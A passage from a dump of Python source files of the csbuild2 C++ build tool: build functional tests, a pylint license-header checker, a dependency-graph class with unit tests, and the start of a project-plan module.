os.F_OK))\n\t\tout = subprocess.check_output([self.outputFile])\n\n\t\tself.assertEqual(out, PlatformBytes(\"Hello, World! Goodbye, World!\"))\n\n\tdef testRecompileAfterChangingLibraryRelinksExecutable(self):\n\t\t\"\"\"Test that recompiling after touching a library file causes the downstream executable to relink\"\"\"\n\t\t_, out, _ = self.assertMakeSucceeds(\"-v\", \"--project=hello_world\", \"--show-commands\")\n\t\tself.assertIn(\"Compiling libhello/libhello.cpp\", out)\n\t\tself.assertIn(\"Linking libhello\", out)\n\t\tself.assertIn(\"Compiling hello_world/hello.cpp\", out)\n\t\tself.assertIn(\"Compiling hello_world/main.cpp\", out)\n\t\tself.assertIn(\"Linking hello_world\", out)\n\n\t\twith open(\"libhello/libhello.cpp\", \"rb\") as f:\n\t\t\tdata = f.read()\n\t\twith open(\"libhello/libhello.cpp\", \"wb\") as f:\n\t\t\tf.write(data.replace(b\"!\", b\"!!!\"))\n\n\t\ttry:\n\t\t\t_, out, _ = self.assertMakeSucceeds(\"-v\", \"--project=hello_world\", \"--show-commands\")\n\t\t\tself.assertIn(\"Compiling libhello/libhello.cpp\", out)\n\t\t\tself.assertIn(\"Linking libhello\", out)\n\t\t\tself.assertNotIn(\"Compiling hello_world/hello.cpp\", out)\n\t\t\tself.assertNotIn(\"Compiling hello_world/main.cpp\", out)\n\t\t\tself.assertIn(\"Linking hello_world\", out)\n\n\t\t\tself.assertTrue(os.access(self.outputFile, os.F_OK))\n\t\t\tout = subprocess.check_output([self.outputFile])\n\n\t\t\tself.assertEqual(out, PlatformBytes(\"Hello, World! 
Goodbye, World!!!\"))\n\t\tfinally:\n\t\t\twith open(\"libhello/libhello.cpp\", \"wb\") as f:\n\t\t\t\tf.write(data)\n\n\tdef testCompileFail(self):\n\t\t\"\"\"Test a compile failure\"\"\"\n\t\tself.cleanArgs = [\"--project=fail_compile\"]\n\t\tself.assertMakeFails(\n\t\t\tR\"ERROR: Build for fail_compile/main\\.cpp in project fail_compile \\(.*\\) failed!\",\n\t\t\t\"-v\",\n\t\t\t\"--project=fail_compile\",\n\t\t\t\"--show-commands\"\n\t\t)\n\n\tdef testLinkFail(self):\n\t\t\"\"\"Test a link failure\"\"\"\n\t\tself.cleanArgs = [\"--project=fail_link\"]\n\t\tself.assertMakeFails(\n\t\t\tR\"ERROR: Build for \\{.*static/fail_link/.*/main\\.(.+)\\} in project fail_link \\(.*\\) failed!\",\n\t\t\t\"-v\",\n\t\t\t\"--project=fail_link\",\n\t\t\t\"--show-commands\"\n\t\t)\n\nclass BasicCppTestSharedLibs(FunctionalTest):\n\t\"\"\"Basic C++ test with shared libraries\"\"\"\n\n\t# pylint: disable=invalid-name\n\tdef setUp(self): # pylint: disable=arguments-differ\n\t\tif platform.system() == \"Windows\":\n\t\t\tself.outputFile = \"shared/hello_world.exe\"\n\t\telse:\n\t\t\tself.outputFile = \"shared/hello_world\"\n\t\toutDir = \"shared\"\n\t\tFunctionalTest.setUp(self, outDir=outDir, cleanArgs=[\"--project=hello_world\", \"--project=libhello\", \"--target=shared\"])\n\n\tdef testAbsPathSharedLibs(self):\n\t\t\"\"\"Test that shared libs specified with absolute paths build successfully\"\"\"\n\t\tself.assertMakeSucceeds(\"-v\", \"--project=libhello\", \"--show-commands\", \"--target=shared\")\n\t\tself.assertMakeSucceeds(\"-v\", \"--project=hello_world\", \"--show-commands\", \"--target=shared\")\n\t\tself.cleanArgs = [\"--project=libhello\", \"--project=hello_world\", \"--target=shared\"]\n\n\t\tself.assertTrue(os.access(self.outputFile, os.F_OK))\n\n\t\tout = subprocess.check_output([self.outputFile])\n\n\t\tself.assertEqual(out, PlatformBytes(\"Hello, World! Goodbye, World!\"))\n" }, { "alpha_fraction": 0.7233306169509888, "alphanum_fraction": 0.7296416759490967, "avg_line_length": 35.38518524169922, "blob_id": "25627a0da96d0c37ca6d684878283e5e747a8964", "content_id": "7c72874d07533d72c18b98f8c8c8b98aaf0f02f9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4912, "license_type": "permissive", "max_line_length": 97, "num_lines": 135, "path": "/csbuild/_testing/pylint_license_check.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: pylint_license_check\n\t:synopsis: Pylint custom checker to check for licensing issues and general always-required stuff\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\nimport re\nimport sys\n\nif sys.version_info.major >= 3:\n\tfrom pylint.interfaces import IRawChecker\n\tfrom pylint.checkers import BaseChecker\n\nelse:\n\tclass IRawChecker(object):\n\t\t# pylint: disable=missing-class-docstring\n\t\tpass\n\n\tclass BaseChecker(object):\n\t\t# pylint: disable=missing-class-docstring\n\t\tpass\n\nMANDATORY_COPYRIGHT_HEADER = R\"\"\"^(# -\\*- coding: utf-8 -\\*-\n\n)?# Copyright \\(C\\) 201\\d [^\\n]+\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files \\(the \"Software\"\\),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software\\.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT\\. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE\\.\"\"\".replace(\"\\r\", \"\")\n\nFUTURE_IMPORT_REQ = \"from __future__ import unicode_literals, division, print_function\"\n\nclass HeaderCheck(BaseChecker):\n\t\"\"\"Check that each module carries the mandatory license header, the required\n\t__future__ imports, and the expected module/package docstring tags.\n\t\"\"\"\n\n\t# pylint: disable=invalid-name\n\n\t__implements__ = IRawChecker\n\n\tname = 'csbuild_license_check'\n\tmsgs = {\n\t\t'E9901': (\n\t\t\t'Missing license header',\n\t\t\t'missing-license-header',\n\t\t\t'missing-license-header'\n\t\t),\n\t\t'E9902': (\n\t\t\t'All files must import unicode_literals, division, and print_function from __future__',\n\t\t\t'missing-future-imports',\n\t\t\t'missing-future-imports'\n\t\t),\n\t\t'E9903': (\n\t\t\t'All modules must include a docstring containing .. module:: <module_name>',\n\t\t\t'module-name-missing-in-docstring',\n\t\t\t'module-name-missing-in-docstring'\n\t\t),\n\t\t'E9904': (\n\t\t\t'__init__.py in a package must include a docstring containing .. 
package:: <package_name>',\n\t\t\t'package-name-missing-in-docstring',\n\t\t\t'package-name-missing-in-docstring'\n\t\t)\n\t}\n\toptions = ()\n\n\tdef process_module(self, module):\n\t\t\"\"\"\n\t\tProcess a module. The module's content is accessible via the module.stream() function.\n\n\t\t:param module: Module being processed.\n\t\t:type module: :class:`astroid.scoped_nodes.Module`\n\t\t\"\"\"\n\t\twith module.stream() as stream:\n\t\t\ttxt = b\"\".join(stream).decode(\"UTF-8\")\n\n\t\t\ttxt = txt.replace(\"\\r\", \"\")\n\n\t\t\tif not re.match(MANDATORY_COPYRIGHT_HEADER, txt):\n\t\t\t\tself.add_message('missing-license-header', line=0)\n\t\t\tif FUTURE_IMPORT_REQ not in txt:\n\t\t\t\tself.add_message('missing-future-imports', line=0)\n\n\t\t\tpackage = os.path.basename(os.path.dirname(module.file))\n\t\t\tmoduleName = os.path.basename(module.file)\n\t\t\tmoduleName = os.path.splitext(moduleName)[0]\n\t\t\tif moduleName == \"__init__\":\n\t\t\t\tif \".. package:: {}\".format(package) not in txt:\n\t\t\t\t\tself.add_message('package-name-missing-in-docstring', line=0)\n\t\t\telif \".. module:: {}\".format(moduleName) not in txt:\n\t\t\t\tself.add_message('module-name-missing-in-docstring', line=0)\n\n\n\ndef register(linter): # pylint: disable=invalid-name\n\t\"\"\"required method to auto register this checker\"\"\"\n\tlinter.register_checker(HeaderCheck(linter))\n" }, { "alpha_fraction": 0.6668647527694702, "alphanum_fraction": 0.6825113892555237, "avg_line_length": 28.354650497436523, "blob_id": "559dd9712697555b4f2cab101836dde80c9c6de8", "content_id": "3c2454f01cebc30107179e85aaec0aabb92e7432", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5049, "license_type": "no_license", "max_line_length": 165, "num_lines": 172, "path": "/csbuild/_utils/dag.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: dag\n\t:synopsis: class representing a directed acyclic graph\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport sys\n\nfrom collections import OrderedDict\nfrom .._testing import testcase\n\nclass DAG(object):\n\t\"\"\"\n\tDirected acyclic graph class.\n\n\t:param keyFunc: Function to resolve an inserted object into a key.
If not specified, the object itself is used.\n\t:type keyFunc: Callable\n\t\"\"\"\n\tdef __init__(self, keyFunc=None):\n\t\tself._graph = OrderedDict()\n\t\tself._deferred = set()\n\t\tif keyFunc is None:\n\t\t\tkeyFunc = lambda x: x\n\t\tself._keyFunc = keyFunc\n\n\n\tdef Add(self, value, dependencies):\n\t\t\"\"\"\n\t\tAdd an item into the graph\n\n\t\t:param value: The value to add\n\t\t:type value: any\n\t\t:param dependencies: List of keys that must precede this one in the graph\n\t\t:type dependencies: list(any)\n\t\t\"\"\"\n\t\tassert self._keyFunc(value) not in self._graph, \"Duplicate item in dependency graph: {}\".format(self._keyFunc(value))\n\t\tfor dependency in dependencies:\n\t\t\tif dependency not in self._graph:\n\t\t\t\tself._deferred.add((value, tuple(dependencies)))\n\t\t\t\treturn\n\t\tself._graph.update({self._keyFunc(value): value})\n\t\twhile True:\n\t\t\tdeletes = []\n\t\t\tfor (otherValue, otherDependencies) in self._deferred:\n\t\t\t\tfor dependency in otherDependencies:\n\t\t\t\t\tif dependency not in self._graph:\n\t\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tself._graph.update({self._keyFunc(otherValue):otherValue})\n\t\t\t\t\tdeletes.append((otherValue, otherDependencies))\n\t\t\tif deletes:\n\t\t\t\tfor delete in deletes:\n\t\t\t\t\tself._deferred.remove(delete)\n\t\t\telse:\n\t\t\t\tbreak\n\n\n\tdef Valid(self):\n\t\t\"\"\"\n\t\tCheck if the graph is valid\n\n\t\t:return: True if all dependencies have been resolved and none are circular, else False\n\t\t:rtype: bool\n\t\t\"\"\"\n\t\treturn bool(not self._deferred)\n\n\tdef __bool__(self):\n\t\t\"\"\"\n\t\tCheck if the graph is valid\n\n\t\t:return: True if all dependencies have been resolved and none are circular, else False\n\t\t:rtype: bool\n\t\t\"\"\"\n\t\treturn self.Valid()\n\n\tif sys.version_info[0] < 3:\n\t\t__nonzero__ = __bool__\n\n\tdef __iter__(self):\n\t\t\"\"\"\n\t\tIterate the items in the graph in an acceptable order such that dependencies are resolved before the things that\n\t\tdepend on them.\n\t\t\"\"\"\n\t\tif not self.Valid():\n\t\t\traise ValueError(\"Could not generate directed acyclic graph - unresolvable dependencies found in items: {}\".format([self._keyFunc(x) for x, _ in self._deferred]))\n\t\tfor val in self._graph.values():\n\t\t\tyield val\n\n\tdef __len__(self):\n\t\treturn len(self._graph) + len(self._deferred)\n\nclass TestDAG(testcase.TestCase):\n\t\"\"\"Test the DAG\"\"\"\n\t# pylint: disable=invalid-name\n\n\tdef testDAG(self):\n\t\t\"\"\"Basic test - this should work\"\"\"\n\t\tdag = DAG()\n\t\tdag.Add(1, [2, 3, 4, 5])\n\t\tdag.Add(3, [4, 5])\n\t\tdag.Add(5, [])\n\t\tdag.Add(2, [3, 4, 5])\n\t\tdag.Add(4, [5])\n\t\tself.assertEqual(5, len(dag))\n\t\tl = list(dag)\n\t\tself.assertEqual(l, [5,4,3,2,1])\n\n\tdef testCircularDependency(self):\n\t\t\"\"\"Circular dependency test, should fail\"\"\"\n\t\tdag = DAG()\n\t\tdag.Add(1, [2, 3, 4, 5])\n\t\tdag.Add(3, [4, 5])\n\t\tdag.Add(5, [1])\n\t\tdag.Add(2, [3, 4, 5])\n\t\tdag.Add(4, [5])\n\t\tself.assertFalse(dag.Valid())\n\t\tself.assertFalse(dag)\n\t\tself.assertEqual(5, len(dag))\n\t\twith self.assertRaises(ValueError):\n\t\t\t_ = list(dag)\n\n\tdef testMissingDependency(self):\n\t\t\"\"\"Missing dependency test, should fail\"\"\"\n\t\tdag = DAG()\n\t\tdag.Add(1, [2, 3, 4, 5])\n\t\tdag.Add(3, [4, 5])\n\t\tdag.Add(5, [])\n\t\tdag.Add(2, [3, 4, 5])\n\t\tself.assertFalse(dag.Valid())\n\t\tself.assertFalse(dag)\n\t\tself.assertEqual(4, len(dag))\n\t\twith self.assertRaises(ValueError):\n\t\t\t_ = list(dag)\n\n\tdef 
testKeyFunc(self):\n\t\t\"\"\"Test that the dag still works with a key function provided\"\"\"\n\t\tclass _intWrap(object):\n\t\t\tdef __init__(self, val):\n\t\t\t\tself.val = val\n\n\t\tdag = DAG(lambda a: a.val)\n\t\tdag.Add(_intWrap(1), [2, 3, 4, 5])\n\t\tdag.Add(_intWrap(3), [4, 5])\n\t\tdag.Add(_intWrap(5), [])\n\t\tdag.Add(_intWrap(2), [3, 4, 5])\n\t\tdag.Add(_intWrap(4), [5])\n\t\tself.assertEqual(5, len(dag))\n\t\tl = list(dag)\n\t\tself.assertEqual([a.val for a in l], [5,4,3,2,1])\n" }, { "alpha_fraction": 0.6965101957321167, "alphanum_fraction": 0.7094470858573914, "avg_line_length": 34.95071792602539, "blob_id": "198d09370fc516930aa544e76693ec7d80a25339", "content_id": "a97ad1d3680e0ea0e5a37c4c928f33a8fbbeaa67", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 35016, "license_type": "no_license", "max_line_length": 182, "num_lines": 974, "path": "/csbuild/_build/project_plan.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: project_plan\n\t:synopsis: Contains non-finalized settings for building a project.\n\t\tThis class is amalgamated with all possible settings this project can have, with all possible\n\t\ttoolchain, architecture, and platform combinations. This plan will be executed per toolchain and architecture\n\t\tto create a concrete Project\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport platform\nimport copy\nimport sys\n\nimport collections\n\nimport csbuild\nfrom . import project\nfrom .. 
import log, perf_timer\nfrom .._utils import ordered_set, MultiBreak\nfrom .._utils.decorators import TypeChecked\nfrom .._utils.string_abc import String\nfrom .._testing import testcase\nfrom ..toolchain import toolchain\n\nif sys.version_info[0] >= 3:\n\tfrom collections.abc import Callable\nelse:\n\tfrom collections import Callable\n\nallPlans = {}\nclass _defaultType(object):\n\tdef __repr__(self):\n\t\treturn \"<default>\"\n\nuseDefault = _defaultType()\n\ndef _getDefaultToolchain():\n\tdefaultToolchain = {\n\t\t\"Windows\": \"msvc\",\n\t\t\"Darwin\": \"clang\",\n\t}\n\t# Get the default toolchain or \"gcc\" as a default when the current\n\t# platform does not have a specific toolchain in the map.\n\treturn defaultToolchain.get(platform.system(), \"gcc\")\n\nclass ProjectPlan(object):\n\t\"\"\"\n\tA plan to create one or more finalized projects.\n\n\t:param name: The project's name. Must be unique.\n\t:type name: str, bytes\n\t:param workingDirectory: The location on disk containing the project's files, which should be examined to collect source files.\n\t\tIf autoDiscoverSourceFiles is False, this parameter is ignored.\n\t:type workingDirectory: str, bytes\n\t:param depends: List of names of other projects this one depends on.\n\t:type depends: list(str, bytes)\n\t:param priority: Priority in the build queue, used to cause this project to get built first in its dependency ordering. Higher number means higher priority.\n\t:type priority: int\n\t:param ignoreDependencyOrdering: Treat priority as a global value and use priority to raise this project above, or lower it below, the dependency order\n\t:type ignoreDependencyOrdering: bool\n\t:param autoDiscoverSourceFiles: If False, do not automatically search the working directory for files, but instead only build files that are manually added.\n\t:type autoDiscoverSourceFiles: bool\n\t:param autoResolveRpaths: If True, automatically add RPATH arguments for linked shared libraries.\n\t:type autoResolveRpaths: bool\n\t:param scriptDir: Directory of the script where this project is defined\n\t:type scriptDir: str, bytes\n\t\"\"\"\n\t@TypeChecked(name=String, workingDirectory=String, depends=list, priority=int, ignoreDependencyOrdering=bool, autoDiscoverSourceFiles=bool, autoResolveRpaths=bool, scriptDir=String)\n\tdef __init__(self, name, workingDirectory, depends, priority, ignoreDependencyOrdering, autoDiscoverSourceFiles, autoResolveRpaths, scriptDir):\n\t\tassert name not in allPlans, \"Duplicate project name: {}\".format(name)\n\t\tself._name = name\n\t\tself._workingDirectory = workingDirectory\n\t\tself._depends = depends\n\t\tself._priority = priority\n\t\tself._ignoreDependencyOrdering = ignoreDependencyOrdering\n\t\tself._autoDiscoverSourceFiles = autoDiscoverSourceFiles\n\t\tself._autoResolveRpaths = autoResolveRpaths\n\t\tself._scriptDir = scriptDir\n\n\t\tif csbuild.currentPlan is not None:\n\t\t\t# pylint: disable=protected-access\n\t\t\tself._settings = copy.deepcopy(csbuild.currentPlan._settings)\n\t\t\tself.defaultTarget = csbuild.currentPlan.defaultTarget\n\t\t\tself.defaultToolchain = csbuild.currentPlan.defaultToolchain\n\t\t\tself.defaultArchitecture = csbuild.currentPlan.defaultArchitecture\n\t\t\tself.defaultArchitectureMap = copy.deepcopy(csbuild.currentPlan.defaultArchitectureMap)\n\n\t\t\tself.selfLimits = copy.deepcopy(csbuild.currentPlan.childLimits)\n\t\t\tself.childLimits = copy.deepcopy(csbuild.currentPlan.childLimits)\n\t\t\tself.knownTargets = set(csbuild.currentPlan.childTargets)\n\t\t\tself.childTargets =
set(self.knownTargets)\n\t\telse:\n\t\t\tself._settings = {}\n\t\t\tself.defaultTarget = \"release\"\n\t\t\tself.defaultToolchain = _getDefaultToolchain()\n\t\t\tself.defaultArchitecture = useDefault\n\t\t\tself.defaultArchitectureMap = {}\n\n\t\t\tself.selfLimits = {\n\t\t\t\t\"toolchain\" : set(),\n\t\t\t\t\"target\" : set(),\n\t\t\t\t\"architecture\" : set(),\n\t\t\t\t\"platform\" : set()\n\t\t\t}\n\t\t\tself.childLimits = copy.deepcopy(self.selfLimits)\n\t\t\tself.knownTargets = set()\n\t\t\tself.childTargets = set()\n\n\t\tself.oldChildLimits = []\n\n\t\tself._workingSettingsStack = [[self._settings]]\n\t\tself._currentSettingsDicts = self._workingSettingsStack[0]\n\t\tallPlans[name] = self\n\n\t@property\n\tdef name(self):\n\t\t\"\"\"\n\t\tGet the project name\n\t\t:return: project name\n\t\t:rtype: str, bytes\n\t\t\"\"\"\n\t\treturn self._name\n\n\t@property\n\tdef depends(self):\n\t\t\"\"\"\n\t\tGet the project dependency list\n\t\t:return: project dependency list\n\t\t:rtype: list\n\t\t\"\"\"\n\t\treturn self._depends\n\n\t_validContextTypes = {\"toolchain\", \"architecture\", \"platform\", \"target\", \"scope\"}\n\n\tdef EnterContext(self, *contextTypes):\n\t\t\"\"\"\n\t\tEnter a context for storing settings overrides.\n\t\t:param contextTypes: list of iterables of (contextType, (list, of, context, names))\n\t\t:type contextTypes: tuple[str, tuple[*str]]\n\t\t\"\"\"\n\t\tnewSettingsDicts = []\n\t\tself.oldChildLimits.append(copy.deepcopy(self.childLimits))\n\t\tfor contextType, names in contextTypes:\n\t\t\tassert contextType in ProjectPlan._validContextTypes, \"Invalid context type!\"\n\n\t\t\tlimits = self.childLimits.get(contextType, None)\n\t\t\tif limits:\n\t\t\t\tlimits.intersection_update(names)\n\t\t\telif limits is not None:\n\t\t\t\tlimits.update(names)\n\n\t\t\tfor name in names:\n\t\t\t\tfor settings in self._currentSettingsDicts:\n\t\t\t\t\tnewSettingsDicts.append(settings.setdefault(\"overrides\", {}).setdefault(contextType, {}).setdefault(name, {}))\n\t\tself._currentSettingsDicts = newSettingsDicts\n\t\tself._workingSettingsStack.append(self._currentSettingsDicts)\n\n\tdef LeaveContext(self):\n\t\t\"\"\"Leave the context and return to the previous one\"\"\"\n\t\tself._workingSettingsStack.pop()\n\t\tself._currentSettingsDicts = self._workingSettingsStack[-1]\n\t\tself.childLimits = self.oldChildLimits[-1]\n\t\tself.oldChildLimits.pop()\n\n\tdef _absorbSettings(self, settings, overrideDict, toolchainName, architectureName, targetName, scopeType, inScope):\n\t\tif overrideDict is None:\n\t\t\treturn\n\n\t\tif not scopeType or inScope:\n\t\t\tfor key, val in overrideDict.items():\n\t\t\t\tif key == \"overrides\":\n\t\t\t\t\tcontinue\n\n\t\t\t\t# Libraries are a special case.\n\t\t\t\t# Any time any project references a library, that library should be moved later in the list.\n\t\t\t\t# Referenced libraries have to be linked after all the libraries that reference them.\n\t\t\t\tif key == \"libraries\":\n\t\t\t\t\tsettings[key] = ordered_set.OrderedSet(settings.get(key, []))\n\t\t\t\t\tsettings[key] -= val\n\t\t\t\t\tsettings[key] |= val\n\t\t\t\t\tcontinue\n\t\t\t\tif isinstance(val, (dict, collections.OrderedDict)):\n\t\t\t\t\tsettings[key] = dict(settings.get(key, {}))\n\t\t\t\t\tsettings[key].update(val)\n\t\t\t\telif isinstance(val, list):\n\t\t\t\t\tsettings[key] = list(settings.get(key, []))\n\t\t\t\t\tsettings[key] += val\n\t\t\t\telif isinstance(val, (set, ordered_set.OrderedSet)):\n\t\t\t\t\tsettings[key] = ordered_set.OrderedSet(settings.get(key, 
[]))\n\t\t\t\t\tsettings[key] |= val\n\t\t\t\telse:\n\t\t\t\t\tif not inScope or key not in self._settings:\n\t\t\t\t\t\tsettings[key] = val\n\t\t# Else this function just recurses down to the next override dict to look for a dict of scopeType\n\n\t\tself._flattenOverrides(settings, overrideDict.get(\"overrides\"), toolchainName, architectureName, targetName, scopeType, inScope)\n\n\tdef _flattenOverrides(self, settings, overrideDict, toolchainName, architectureName, targetName, scopeType=\"\", inScope=False):\n\t\tif overrideDict is None:\n\t\t\treturn\n\n\t\tself._absorbSettings(settings, overrideDict.get(\"toolchain\", {}).get(toolchainName), toolchainName, architectureName, targetName, scopeType, inScope)\n\t\tself._absorbSettings(settings, overrideDict.get(\"architecture\", {}).get(architectureName), toolchainName, architectureName, targetName, scopeType, inScope)\n\t\tself._absorbSettings(settings, overrideDict.get(\"target\", {}).get(targetName), toolchainName, architectureName, targetName, scopeType, inScope)\n\t\tself._absorbSettings(settings, overrideDict.get(\"platform\", {}).get(platform.system()), toolchainName, architectureName, targetName, scopeType, inScope)\n\t\tif scopeType:\n\t\t\tself._absorbSettings(settings, overrideDict.get(\"scope\", {}).get(scopeType), toolchainName, architectureName, targetName, scopeType, True)\n\n\tdef _getFinalValueFromOverride(self, overrideDict, name, toolchainName, architectureName, targetName, default):\n\t\tif overrideDict is not None:\n\t\t\tdefault = overrideDict.get(name, default)\n\t\t\tdefault = self._getFinalValue(overrideDict.get(\"overrides\"), name, toolchainName, architectureName, targetName, default)\n\t\treturn default\n\n\tdef _getFinalValue(self, overrideDict, name, toolchainName, architectureName, targetName, default):\n\t\tif overrideDict is not None:\n\t\t\tdefault = overrideDict.get(\"scope\", {}).get(name, default)\n\t\t\tdefault = self._getFinalValueFromOverride(overrideDict.get(\"toolchain\", {}).get(toolchainName), name, toolchainName, architectureName, targetName, default)\n\t\t\tdefault = self._getFinalValueFromOverride(overrideDict.get(\"architecture\", {}).get(architectureName), name, toolchainName, architectureName, targetName, default)\n\t\t\tdefault = self._getFinalValueFromOverride(overrideDict.get(\"target\", {}).get(targetName), name, toolchainName, architectureName, targetName, default)\n\t\t\tdefault = self._getFinalValueFromOverride(overrideDict.get(\"platform\", {}).get(platform.system()), name, toolchainName, architectureName, targetName, default)\n\t\treturn default\n\n\tdef _flattenDepends(self, flattenedDepends, dependObj):\n\t\t# pylint: disable=protected-access\n\t\tfor depend in dependObj._depends:\n\t\t\tassert depend in allPlans, \"Project {} references unknown dependency {}\".format(dependObj._name, depend)\n\t\t\tif depend == self._name:\n\t\t\t\tcontinue\n\t\t\tself._flattenDepends(flattenedDepends, allPlans[depend])\n\t\t\tflattenedDepends.add(depend)\n\n\t@TypeChecked(toolchainName=(String, _defaultType), architectureName=(String, _defaultType), targetName=(String, _defaultType))\n\tdef ExecutePlan(self, toolchainName, architectureName, targetName):\n\t\t\"\"\"\n\t\tExecute the project plan for a given toolchain and architecture to create a concrete project.\n\n\t\t:param toolchainName: The toolchain to execute the plan for\n\t\t:type toolchainName: str, bytes\n\t\t:param architectureName: The architecture to execute the plan for\n\t\t:type architectureName: str, bytes\n\t\t:param 
targetName: The target to execute the plan for\n\t\t:type targetName: str, bytes\n\t\t:return: A concrete project\n\t\t:rtype: project.Project\n\t\t\"\"\"\n\t\twith perf_timer.PerfTimer(\"Project plan validation\"):\n\t\t\tassert len(self._workingSettingsStack) == 1 and \\\n\t\t\t\t\tlen(self._workingSettingsStack[0]) == 1 and \\\n\t\t\t\t\tself._workingSettingsStack[0][0] == self._settings and \\\n\t\t\t\t\tlen(self._currentSettingsDicts) == 1 and \\\n\t\t\t\t\tself._currentSettingsDicts[0] == self._settings, \\\n\t\t\t\t\t\"ExecutePlan() called from within a context!\"\n\n\t\t\tfrom .. import ProjectType\n\n\t\t\tif targetName is useDefault:\n\t\t\t\ttargetName = self.defaultTarget\n\t\t\tif toolchainName is useDefault:\n\t\t\t\ttoolchainName = self.defaultToolchain\n\t\t\tif architectureName is useDefault:\n\t\t\t\tif self.defaultArchitecture is useDefault:\n\t\t\t\t\tarchitectureName = self.defaultArchitectureMap[toolchainName]\n\t\t\t\telse:\n\t\t\t\t\tarchitectureName = self.defaultArchitecture\n\n\t\t\tassert \"overrides\" in self._settings \\\n\t\t\t\tand \"toolchain\" in self._settings[\"overrides\"] \\\n\t\t\t\t and toolchainName in self._settings[\"overrides\"][\"toolchain\"], \\\n\t\t\t\t\"Toolchain {} has not been registered for project {}\".format(toolchainName, self._name)\n\n\t\t\ttoolchains = self.selfLimits[\"toolchain\"]\n\t\t\tif toolchains and toolchainName not in toolchains:\n\t\t\t\tlog.Info(\"Project {} does not support toolchain {}\", 